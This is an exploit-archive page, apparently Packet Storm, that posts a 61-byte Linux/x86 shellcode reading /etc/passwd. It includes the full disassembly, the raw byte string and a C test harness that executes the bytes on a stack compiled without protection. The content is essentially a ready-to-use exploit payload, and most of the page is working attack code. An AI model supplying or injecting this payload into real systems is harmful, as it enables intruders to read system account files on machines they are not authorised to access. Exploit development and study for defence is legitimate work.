Twenty Year Anniversary

Linux/x86 Read File (/etc/passwd) MSF Optimized Shellcode

Linux/x86 Read File (/etc/passwd) MSF Optimized Shellcode
Posted Sep 14, 2018
Authored by Ray Doyle

61 bytes small Linux/x86 read file (/etc/passwd) MSF optimized shellcode.

tags | x86, shellcode
systems | linux
MD5 | 774bb96e53da0cf6170ece1a360e3be1

Linux/x86 Read File (/etc/passwd) MSF Optimized Shellcode

Change Mirror Download
/* 
# Shellcode Title: Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Homepage: https://www.doyler.net
# Tested on: Linux/x86
# gcc -o readfile_shellcode -z execstack -fno-stack-protector readfile_shellcode.c
*/

/****************************************************
Disassembly of section .text:

08048060 <_start>:
8048060: eb 2b jmp 804808d <call_shellcode>

08048062 <shellcode>:
8048062: 31 c0 xor eax,eax
8048064: b0 05 mov al,0x5
8048066: 5b pop ebx
8048067: 31 c9 xor ecx,ecx
8048069: cd 80 int 0x80
804806b: 89 c3 mov ebx,eax
804806d: b0 03 mov al,0x3
804806f: 89 e7 mov edi,esp
8048071: 89 f9 mov ecx,edi
8048073: 31 d2 xor edx,edx
8048075: b6 10 mov dh,0x10
8048077: cd 80 int 0x80
8048079: 89 c2 mov edx,eax
804807b: 31 c0 xor eax,eax
804807d: b0 04 mov al,0x4
804807f: 31 db xor ebx,ebx
8048081: b3 01 mov bl,0x1
8048083: cd 80 int 0x80
8048085: 31 c0 xor eax,eax
8048087: b0 01 mov al,0x1
8048089: 31 db xor ebx,ebx
804808b: cd 80 int 0x80

0804808d <call_shellcode>:
804808d: e8 d0 ff ff ff call 8048062 <shellcode>

08048092 <message>:
8048092: 2f das
8048093: 65 gs
8048094: 74 63 je 80480f9 <message+0x67>
8048096: 2f das
8048097: 70 61 jo 80480fa <message+0x68>
8048099: 73 73 jae 804810e <message+0x7c>
804809b: 77 64 ja 8048101 <message+0x6f>
****************************************************/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x2b\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\x10\xcd\x80\x89\xc2\x31\xc0\xb0\x04\x31\xdb\xb3\x01\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd0\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";

main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close